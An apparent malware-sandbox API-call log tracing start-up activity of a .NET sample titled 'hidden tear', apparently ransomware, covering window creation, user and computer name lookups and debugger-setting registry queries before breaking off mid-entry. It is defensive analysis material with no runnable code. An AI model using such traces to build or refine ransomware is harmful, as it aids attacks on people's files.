# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jul 9 2019 16:03:52 # Log Creation Date: 11.07.2019 16:09:56.961 Process: id = "1" image_name = "local.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\local.exe" page_root = "0x4ba29000" os_pid = "0x970" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x974 [0030.208] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0031.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x3ae75c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0032.005] IsAppThemed () returned 0x1 [0032.006] CoTaskMemAlloc (cb=0xf0) returned 0x416ab8 [0032.006] CreateActCtxA (pActCtx=0x3aec58) returned 0x416cac [0032.071] CoTaskMemFree (pv=0x416ab8) [0032.076] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc140 [0032.076] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc13e [0032.085] GetUserNameW (in: lpBuffer=0x3aea80, pcbBuffer=0x3aecf8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3aecf8) returned 1 [0032.086] GetComputerNameW (in: lpBuffer=0x3aea80, nSize=0x3aecf8 | out: lpBuffer="XDUWTFONO", nSize=0x3aecf8) returned 1 [0032.101] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0032.504] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x73e70000 [0032.526] AdjustWindowRectEx (in: lpRect=0x3aec98, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50081 | out: lpRect=0x3aec98) returned 1 [0032.528] GetCurrentProcess () returned 0xffffffff [0032.528] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3aebb0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3aebb0*=0x1f4) returned 1 [0032.544] GetCurrentActCtx (in: lphActCtx=0x3aeb10 | out: lphActCtx=0x3aeb10*=0x0) returned 1 [0032.544] ActivateActCtx (in: hActCtx=0x416cac, lpCookie=0x3aeb20 | out: hActCtx=0x416cac, lpCookie=0x3aeb20) returned 1 [0032.544] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0033.024] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x73cd0000 [0033.036] GetModuleHandleW (lpModuleName="user32.dll") returned 0x74f40000 [0033.036] GetProcAddress (hModule=0x74f40000, lpProcName="DefWindowProcW") returned 0x771625dd [0033.037] GetStockObject (i=5) returned 0x1900015 [0033.055] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0033.058] CoTaskMemAlloc (cb=0x5c) returned 0x4252f8 [0033.059] RegisterClassW (lpWndClass=0x3ae9c8) returned 0xc136 [0033.059] CoTaskMemFree (pv=0x4252f8) [0033.060] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0033.061] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x40122 [0033.062] SetWindowLongW (hWnd=0x40122, nIndex=-4, dwNewLong=1997940189) returned 5310438 [0033.062] GetWindowLongW (hWnd=0x40122, nIndex=-4) returned 1997940189 [0033.126] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ae2d8 | out: phkResult=0x3ae2d8*=0x210) returned 0x0 [0033.126] RegQueryValueExW (in: hKey=0x210, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x3ae2f8, lpData=0x0, lpcbData=0x3ae2f4*=0x0 | out: lpType=0x3ae2f8*=0x0, lpData=0x0, lpcbData=0x3ae2f4*=0x0) returned 0x2 [0033.126] RegQueryValueExW (in: hKey=0x210, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x3ae2f8, lpData=0x0, lpcbData=0x3ae2f4*=0x0 | out: lpType=0x3ae2f8*=0x0, lpData=0x0, lpcbData=0x3ae2f4*=0x0) returned 0x2 [0033.127] RegCloseKey (hKey=0x210) returned 0x0 [0033.128] SetWindowLongW (hWnd=0x40122, nIndex=-4, dwNewLong=5310478) returned 1997940189 [0033.128] GetWindowLongW (hWnd=0x40122, nIndex=-4) returned 5310478 [0033.128] GetWindowLongW (hWnd=0x40122, nIndex=-16) returned 113311744 [0033.129] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc137 [0033.130] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc138 [0033.130] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x40122, Msg=0x81, wParam=0x0, lParam=0x3ae5a4) returned 0x1 [0033.130] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x40122, Msg=0x83, wParam=0x0, lParam=0x3ae590) returned 0x0 [0033.130] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x40122, Msg=0x1, wParam=0x0, lParam=0x3ae5a4) returned 0x0 [0033.130] GetClientRect (in: hWnd=0x40122, lpRect=0x3ae30c | out: lpRect=0x3ae30c) returned 1 [0033.131] GetWindowRect (in: hWnd=0x40122, lpRect=0x3ae30c | out: lpRect=0x3ae30c) returned 1 [0033.132] GetParent (hWnd=0x40122) returned 0x0 [0033.132] DeactivateActCtx (dwFlags=0x0, ulCookie=0x13330001) returned 1 [0033.151] EtwEventRegister () returned 0x0 [0033.155] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73e70000 [0033.155] AdjustWindowRectEx (in: lpRect=0x3aec44, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x3aec44) returned 1 [0033.155] GetSystemMetrics (nIndex=59) returned 1460 [0033.155] GetSystemMetrics (nIndex=60) returned 920 [0033.155] GetSystemMetrics (nIndex=34) returned 132 [0033.155] GetSystemMetrics (nIndex=35) returned 38 [0033.155] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73e70000 [0033.155] AdjustWindowRectEx (in: lpRect=0x3aeb44, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x3aeb44) returned 1 [0033.159] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", nBufferLength=0x105, lpBuffer=0x3ae554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", lpFilePart=0x0) returned 0x36 [0033.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae9e8) returned 1 [0033.161] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\local.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x3aea64 | out: lpFileInformation=0x3aea64*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0033.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae9e4) returned 1 [0033.593] GetSystemMetrics (nIndex=11) returned 32 [0033.594] GetSystemMetrics (nIndex=12) returned 32 [0033.602] GetDC (hWnd=0x0) returned 0x4010840 [0033.605] GetDeviceCaps (hdc=0x4010840, index=12) returned 32 [0033.605] GetDeviceCaps (hdc=0x4010840, index=14) returned 1 [0033.605] ReleaseDC (hWnd=0x0, hDC=0x4010840) returned 1 [0033.613] CreateIconFromResourceEx (presbits=0x23bc228, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x3016f [0033.615] CreateCompatibleDC (hdc=0x0) returned 0xc010858 [0033.616] GetSystemDefaultLCID () returned 0x409 [0033.616] GetStockObject (i=17) returned 0x18a0025 [0033.625] GetObjectW (in: h=0x18a0025, c=92, pv=0x3ae9a8 | out: pv=0x3ae9a8) returned 92 [0033.626] GetDC (hWnd=0x0) returned 0x4010840 [0033.660] GdiplusStartup (in: token=0x1e5e68, input=0x3adf78, output=0x3adfc8 | out: token=0x1e5e68, output=0x3adfc8) returned 0x0 [0033.677] CoTaskMemAlloc (cb=0x5c) returned 0x4252f8 [0033.678] GdipCreateFontFromLogfontW (hdc=0x4010840, logfont=0x4252f8, font=0x3aea70) returned 0x0 [0034.113] CoTaskMemFree (pv=0x4252f8) [0034.113] CoTaskMemAlloc (cb=0x5c) returned 0x4252f8 [0034.114] CoTaskMemFree (pv=0x4252f8) [0034.114] CoTaskMemAlloc (cb=0x5c) returned 0x4252f8 [0034.114] CoTaskMemFree (pv=0x4252f8) [0034.122] GdipGetFontUnit (font=0x4fd2230, unit=0x3aea3c) returned 0x0 [0034.122] GdipGetFontSize (font=0x4fd2230, size=0x3aea40) returned 0x0 [0034.122] GdipGetFontStyle (font=0x4fd2230, style=0x3aea38) returned 0x0 [0034.130] GdipGetFamily (font=0x4fd2230, family=0x3aea34) returned 0x0 [0034.130] GdipGetFontSize (font=0x4fd2230, size=0x23bd794) returned 0x0 [0034.130] ReleaseDC (hWnd=0x0, hDC=0x4010840) returned 1 [0034.131] GetDC (hWnd=0x0) returned 0x1501025e [0034.134] GdipCreateFromHDC (hdc=0x1501025e, graphics=0x3aea5c) returned 0x0 [0034.135] GdipGetDpiY (graphics=0x4e5fcf0, dpi=0x23bd89c) returned 0x0 [0034.136] GdipGetFontHeight (font=0x4fd2230, graphics=0x4e5fcf0, height=0x3aea54) returned 0x0 [0034.136] GdipGetEmHeight (family=0x4fdf6b8, style=0, EmHeight=0x3aea5c) returned 0x0 [0034.136] GdipGetLineSpacing (family=0x4fdf6b8, style=0, LineSpacing=0x3aea5c) returned 0x0 [0034.137] GdipDeleteGraphics (graphics=0x4e5fcf0) returned 0x0 [0034.137] ReleaseDC (hWnd=0x0, hDC=0x1501025e) returned 1 [0034.137] GdipCreateFont (fontFamily=0x4fdf6b8, emSize=0x41040000, style=0, unit=0x3, font=0x23bd85c) returned 0x0 [0034.137] GdipGetFontSize (font=0x4eb2940, size=0x23bd860) returned 0x0 [0034.137] GdipDeleteFont (font=0x4fd2230) returned 0x0 [0034.139] GetDC (hWnd=0x0) returned 0x1501025e [0034.139] GdipCreateFromHDC (hdc=0x1501025e, graphics=0x3aea80) returned 0x0 [0034.139] CoTaskMemAlloc (cb=0x5c) returned 0x4252f8 [0034.139] GdipGetLogFontW (font=0x4eb2940, graphics=0x4e5fcf0, logfontW=0x4252f8) returned 0x0 [0034.139] CoTaskMemFree (pv=0x4252f8) [0034.140] CoTaskMemAlloc (cb=0x5c) returned 0x4252f8 [0034.140] CoTaskMemFree (pv=0x4252f8) [0034.140] CoTaskMemAlloc (cb=0x5c) returned 0x4252f8 [0034.140] CoTaskMemFree (pv=0x4252f8) [0034.140] GdipDeleteGraphics (graphics=0x4e5fcf0) returned 0x0 [0034.140] ReleaseDC (hWnd=0x0, hDC=0x1501025e) returned 1 [0034.140] CoTaskMemAlloc (cb=0x5c) returned 0x4252f8 [0034.140] CreateFontIndirectW (lplf=0x4252f8) returned 0x180a025c [0034.140] CoTaskMemFree (pv=0x4252f8) [0034.141] SelectObject (hdc=0xc010858, h=0x180a025c) returned 0x18a002e [0034.141] GetTextMetricsW (in: hdc=0xc010858, lptm=0x3aeb8c | out: lptm=0x3aeb8c) returned 1 [0034.141] GetTextExtentPoint32W (in: hdc=0xc010858, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x23bdab8 | out: psizl=0x23bdab8) returned 1 [0034.143] SelectObject (hdc=0xc010858, h=0x18a002e) returned 0x180a025c [0034.143] DeleteDC (hdc=0xc010858) returned 1 [0034.144] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73e70000 [0034.144] AdjustWindowRectEx (in: lpRect=0x3ae8d8, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x3ae8d8) returned 1 [0034.144] AdjustWindowRectEx (in: lpRect=0x3aeb18, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x3aeb18) returned 1 [0034.144] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73e70000 [0034.144] AdjustWindowRectEx (in: lpRect=0x3ae850, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x3ae850) returned 1 [0034.144] AdjustWindowRectEx (in: lpRect=0x3ae950, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x3ae950) returned 1 [0034.145] GetSystemMetrics (nIndex=34) returned 132 [0034.145] GetSystemMetrics (nIndex=35) returned 38 [0034.145] GetCurrentActCtx (in: lphActCtx=0x3aeccc | out: lphActCtx=0x3aeccc*=0x0) returned 1 [0034.145] ActivateActCtx (in: hActCtx=0x416cac, lpCookie=0x3aecdc | out: hActCtx=0x416cac, lpCookie=0x3aecdc) returned 1 [0034.145] GetCurrentActCtx (in: lphActCtx=0x3aeaec | out: lphActCtx=0x3aeaec*=0x416cac) returned 1 [0034.145] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0034.145] AdjustWindowRectEx (in: lpRect=0x3aea30, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x3aea30) returned 1 [0034.145] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0034.145] CreateWindowExW (dwExStyle=0x50080, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName="hidden tear", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=136, nHeight=57, hWndParent=0x0, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x401c2 [0034.146] SetWindowLongW (hWnd=0x401c2, nIndex=-4, dwNewLong=1997940189) returned 5310438 [0034.146] GetWindowLongW (hWnd=0x401c2, nIndex=-4) returned 1997940189 [0034.146] SetWindowLongW (hWnd=0x401c2, nIndex=-4, dwNewLong=5310558) returned 1997940189 [0034.146] GetWindowLongW (hWnd=0x401c2, nIndex=-4) returned 5310558 [0034.146] GetWindowLongW (hWnd=0x401c2, nIndex=-16) returned 114229248 [0034.146] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x81, wParam=0x0, lParam=0x3ae580) returned 0x1 [0034.147] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x83, wParam=0x0, lParam=0x3ae56c) returned 0x0 [0034.249] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x1, wParam=0x0, lParam=0x3ae580) returned 0x0 [0034.249] GetClientRect (in: hWnd=0x401c2, lpRect=0x3ae2b8 | out: lpRect=0x3ae2b8) returned 1 [0034.249] GetWindowRect (in: hWnd=0x401c2, lpRect=0x3ae2b8 | out: lpRect=0x3ae2b8) returned 1 [0034.250] SetWindowTextW (hWnd=0x401c2, lpString="hidden tear") returned 1 [0034.250] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xc, wParam=0x0, lParam=0x23a8a80) returned 0x1 [0034.276] GetUserObjectInformationA (in: hObj=0x5c, nIndex=1, pvInfo=0x23be060, nLength=0xc, lpnLengthNeeded=0x3ae1b8 | out: pvInfo=0x23be060, lpnLengthNeeded=0x3ae1b8) returned 1 [0034.279] SetConsoleCtrlHandler (HandlerRoutine=0x510886, Add=1) returned 1 [0034.280] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0034.280] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0034.282] GetClassInfoW (in: hInstance=0xf70000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x23be0c4 | out: lpWndClass=0x23be0c4) returned 0 [0034.283] CoTaskMemAlloc (cb=0x58) returned 0x4091c0 [0034.283] RegisterClassW (lpWndClass=0x3ae108) returned 0xc13a [0034.283] CoTaskMemFree (pv=0x4091c0) [0034.284] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x6011c [0034.285] NtdllDefWindowProc_W () returned 0x0 [0034.285] NtdllDefWindowProc_W () returned 0x0 [0034.285] NtdllDefWindowProc_W () returned 0x0 [0034.285] NtdllDefWindowProc_W () returned 0x0 [0034.291] GetStartupInfoW (in: lpStartupInfo=0x23be518 | out: lpStartupInfo=0x23be518*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0034.291] GetParent (hWnd=0x401c2) returned 0x0 [0034.291] SetWindowLongW (hWnd=0x401c2, nIndex=-8, dwNewLong=0) returned 0 [0034.291] GetSystemMetrics (nIndex=49) returned 16 [0034.291] GetSystemMetrics (nIndex=50) returned 16 [0034.292] CreateIconFromResourceEx (presbits=0x23be598, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x901b7 [0034.293] SendMessageW (hWnd=0x401c2, Msg=0x80, wParam=0x0, lParam=0x901b7) returned 0x0 [0034.293] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x80, wParam=0x0, lParam=0x901b7) returned 0x0 [0034.293] SendMessageW (hWnd=0x401c2, Msg=0x80, wParam=0x1, lParam=0x3016f) returned 0x0 [0034.294] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x80, wParam=0x1, lParam=0x3016f) returned 0x0 [0034.309] GetSystemMenu (hWnd=0x401c2, bRevert=0) returned 0x230109 [0034.311] GetWindowPlacement (in: hWnd=0x401c2, lpwndpl=0x3aeafc | out: lpwndpl=0x3aeafc) returned 1 [0034.311] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0034.311] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0034.311] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0034.311] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0034.311] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0034.311] GetClientRect (in: hWnd=0x401c2, lpRect=0x3aeb40 | out: lpRect=0x3aeb40) returned 1 [0034.311] GetClientRect (in: hWnd=0x401c2, lpRect=0x3aeaa0 | out: lpRect=0x3aeaa0) returned 1 [0034.311] GetWindowRect (in: hWnd=0x401c2, lpRect=0x3aeaa0 | out: lpRect=0x3aeaa0) returned 1 [0034.312] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0034.312] GetWindowLongW (hWnd=0x401c2, nIndex=-16) returned 114229248 [0034.312] GetWindowTextLengthW (hWnd=0x401c2) returned 11 [0034.312] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.312] GetSystemMetrics (nIndex=42) returned 0 [0034.312] GetWindowTextW (in: hWnd=0x401c2, lpString=0x3aea18, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.312] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xd, wParam=0xc, lParam=0x3aea18) returned 0xb [0034.313] GetWindowTextLengthW (hWnd=0x401c2) returned 11 [0034.313] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.313] GetSystemMetrics (nIndex=42) returned 0 [0034.313] GetWindowTextW (in: hWnd=0x401c2, lpString=0x3aea18, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.313] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xd, wParam=0xc, lParam=0x3aea18) returned 0xb [0034.313] GetWindowLongW (hWnd=0x401c2, nIndex=-16) returned 114229248 [0034.313] GetWindowLongW (hWnd=0x401c2, nIndex=-20) returned 328064 [0034.313] SetWindowLongW (hWnd=0x401c2, nIndex=-16, dwNewLong=47120384) returned 114229248 [0034.313] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x7c, wParam=0xfffffff0, lParam=0x3aea94) returned 0x0 [0034.313] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x7d, wParam=0xfffffff0, lParam=0x3aea94) returned 0x0 [0034.314] SetWindowLongW (hWnd=0x401c2, nIndex=-20, dwNewLong=327808) returned 328064 [0034.314] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x7c, wParam=0xffffffec, lParam=0x3aea94) returned 0x0 [0034.314] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x7d, wParam=0xffffffec, lParam=0x3aea94) returned 0x0 [0034.314] SetWindowPos (hWnd=0x401c2, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0034.314] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x46, wParam=0x0, lParam=0x3aeab4) returned 0x0 [0034.314] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x83, wParam=0x1, lParam=0x3aea8c) returned 0x0 [0034.315] GetWindowPlacement (in: hWnd=0x401c2, lpwndpl=0x3ae864 | out: lpwndpl=0x3ae864) returned 1 [0034.315] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x47, wParam=0x0, lParam=0x3aeab4) returned 0x0 [0034.315] GetClientRect (in: hWnd=0x401c2, lpRect=0x3ae814 | out: lpRect=0x3ae814) returned 1 [0034.315] GetWindowRect (in: hWnd=0x401c2, lpRect=0x3ae814 | out: lpRect=0x3ae814) returned 1 [0034.316] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x83, wParam=0x1, lParam=0x3ae698) returned 0x0 [0034.316] RedrawWindow (hWnd=0x401c2, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0034.316] GetSystemMenu (hWnd=0x401c2, bRevert=0) returned 0x230109 [0034.316] GetWindowPlacement (in: hWnd=0x401c2, lpwndpl=0x3aeaec | out: lpwndpl=0x3aeaec) returned 1 [0034.316] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0034.316] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0034.316] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0034.316] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0034.316] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0034.316] ShowWindow (hWnd=0x401c2, nCmdShow=5) returned 0 [0034.317] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0034.317] GetWindowTextLengthW (hWnd=0x401c2) returned 11 [0034.317] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.317] GetSystemMetrics (nIndex=42) returned 0 [0034.317] GetWindowTextW (in: hWnd=0x401c2, lpString=0x3ae758, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.317] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xd, wParam=0xc, lParam=0x3ae758) returned 0xb [0034.321] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0034.321] GetWindowLongW (hWnd=0x401c2, nIndex=-16) returned 114229248 [0034.321] GetWindowTextLengthW (hWnd=0x401c2) returned 11 [0034.321] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.321] GetSystemMetrics (nIndex=42) returned 0 [0034.321] GetWindowTextW (in: hWnd=0x401c2, lpString=0x3ae638, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.321] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xd, wParam=0xc, lParam=0x3ae638) returned 0xb [0034.321] GetWindowTextLengthW (hWnd=0x401c2) returned 11 [0034.322] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.322] GetSystemMetrics (nIndex=42) returned 0 [0034.322] GetWindowTextW (in: hWnd=0x401c2, lpString=0x3ae638, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.322] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xd, wParam=0xc, lParam=0x3ae638) returned 0xb [0034.322] GetWindowLongW (hWnd=0x401c2, nIndex=-16) returned 114229248 [0034.322] GetWindowLongW (hWnd=0x401c2, nIndex=-20) returned 328064 [0034.322] SetWindowLongW (hWnd=0x401c2, nIndex=-16, dwNewLong=315555840) returned 114229248 [0034.322] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x7c, wParam=0xfffffff0, lParam=0x3ae6b4) returned 0x0 [0034.322] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x7d, wParam=0xfffffff0, lParam=0x3ae6b4) returned 0x0 [0034.322] SetWindowLongW (hWnd=0x401c2, nIndex=-20, dwNewLong=852096) returned 328064 [0034.322] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x7c, wParam=0xffffffec, lParam=0x3ae6b4) returned 0x0 [0034.328] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x7d, wParam=0xffffffec, lParam=0x3ae6b4) returned 0x0 [0034.328] SetWindowPos (hWnd=0x401c2, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0034.328] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x46, wParam=0x0, lParam=0x3ae6d4) returned 0x0 [0034.328] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x83, wParam=0x1, lParam=0x3ae6ac) returned 0x0 [0034.328] GetWindowPlacement (in: hWnd=0x401c2, lpwndpl=0x3ae484 | out: lpwndpl=0x3ae484) returned 1 [0034.328] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x47, wParam=0x0, lParam=0x3ae6d4) returned 0x0 [0034.329] GetClientRect (in: hWnd=0x401c2, lpRect=0x3ae434 | out: lpRect=0x3ae434) returned 1 [0034.329] GetWindowRect (in: hWnd=0x401c2, lpRect=0x3ae434 | out: lpRect=0x3ae434) returned 1 [0034.329] RedrawWindow (hWnd=0x401c2, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0034.329] GetSystemMenu (hWnd=0x401c2, bRevert=0) returned 0x230109 [0034.329] GetWindowPlacement (in: hWnd=0x401c2, lpwndpl=0x3ae70c | out: lpwndpl=0x3ae70c) returned 1 [0034.329] EnableMenuItem (hMenu=0x230109, 